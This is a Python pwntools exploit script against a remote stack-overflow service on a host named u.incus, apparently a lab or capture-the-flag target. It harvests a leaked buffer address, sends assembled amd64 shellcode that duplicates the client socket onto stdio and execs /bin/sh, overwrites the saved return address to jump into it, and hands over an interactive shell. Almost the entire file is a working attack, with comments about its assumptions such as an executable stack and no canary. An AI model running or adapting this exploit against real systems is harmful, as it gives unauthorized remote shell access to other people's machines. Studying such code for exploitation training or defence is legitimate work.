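"""Stack-overflow exploit: shellcode placed in the leaked buffer, saved RIP pointed back at it.

Flow: send a throwaway line, read the server's ``DEBUG: buf is at <hex>`` leak,
then send ``shellcode + 'A' filler + p64(buf_addr)`` so the overwritten return
address lands on the start of the shellcode.  The shellcode dup2()s a fixed fd
onto stdin/stdout/stderr and execve()s /bin/sh.

Usage: ``python exploit.py [HOST [PORT]]`` (defaults: u.incus 8080).
"""
import sys

from pwn import *

context(arch='amd64', os='linux')

# Distance from the start of `buf` to the saved return address.  Presumably
# measured for the target binary (TODO confirm); the 'A' filler covers whatever
# lies between the end of the shellcode and the saved RIP.
RET_OFFSET = 280

# Default target; override on the command line, e.g. `::1 8080` for a local
# instance or the target's IPv6 address.
DEFAULT_HOST = "u.incus"
DEFAULT_PORT = 8080

# pwntools shellcraft output (dupsh + execve).  A raw string keeps the `\x00`
# inside the assembler comments as text rather than turning them into literal
# NUL characters in the source handed to the assembler; the assembled bytes are
# unchanged.  NOTE(review): the first comment says "rbp", but the code dups fd 5
# — the fd the accepted client socket is assumed to have in the target process
# (TODO confirm against the server).
SHELLCODE_SRC = r'''
    /* dup() file descriptor rbp into stdin/stdout/stderr */
    push 2
    pop rsi
    push 5
    pop rdi
    /* dup2(fd='rdi', fd2='rsi') */
    /* setregs noop */
    /* call dup2() */
    push SYS_dup2 /* 0x21 */
    pop rax
    syscall
    dec rsi
    push SYS_dup2 /* 0x21 */
    pop rax
    syscall
    dec rsi
    push SYS_dup2 /* 0x21 */
    pop rax
    syscall
    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push b'/bin///sh\x00' */
    push 0x68
    mov rax, 0x732f2f2f6e69622f
    push rax
    mov rdi, rsp
    /* push argument array ['sh\x00'] */
    /* push b'sh\x00' */
    push 0x1010101 ^ 0x6873
    xor dword ptr [rsp], 0x1010101
    xor esi, esi /* 0 */
    push rsi /* null terminate */
    push 8
    pop rsi
    add rsi, rsp
    push rsi /* 'sh\x00' */
    mov rsi, rsp
    xor edx, edx /* 0 */
    /* call execve() */
    push SYS_execve /* 0x3b */
    pop rax
    syscall
'''


def build_payload(shellcode: bytes, buf_addr: int) -> bytes:
    """Return shellcode, 'A' filler up to RET_OFFSET, then the 8-byte return address.

    Raises SystemExit when the shellcode does not fit in front of the saved RIP
    (``b'A' * (280 - len(sc))`` silently went negative and mangled the layout)
    or contains a newline: the payload is delivered with sendline(), so the
    target's reader is presumably line-oriented and a 0x0a byte would truncate it.
    """
    if len(shellcode) > RET_OFFSET:
        raise SystemExit(
            f"shellcode is {len(shellcode)} bytes; only {RET_OFFSET} fit before the return address"
        )
    if b"\n" in shellcode:
        raise SystemExit("shellcode contains 0x0a; a line-based read on the target would cut the payload short")
    # p64() is little-endian, matching the amd64 context set above.
    return shellcode.ljust(RET_OFFSET, b"A") + p64(buf_addr)


def main() -> None:
    """Connect, harvest the buffer-address leak, deliver the payload, hand over the shell."""
    host = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_HOST
    port = int(sys.argv[2]) if len(sys.argv) > 2 else DEFAULT_PORT

    sc = asm(SHELLCODE_SRC)
    log.info(f"shellcode: {len(sc)} bytes")

    with remote(host, port) as io:
        # The first line is a throwaway; the server answers it with the leak.
        io.sendline(b"abc")
        io.recvuntil(b"DEBUG: buf is at ")
        buf_addr = int(io.recvline().decode().strip(), 16)
        log.info(f"buf is at {buf_addr:#x}")

        # Returning straight into the buffer assumes an executable stack and no
        # canary between buf and the saved RIP — presumably true for this target.
        io.sendline(build_payload(sc, buf_addr))
        io.interactive()


if __name__ == "__main__":
    main()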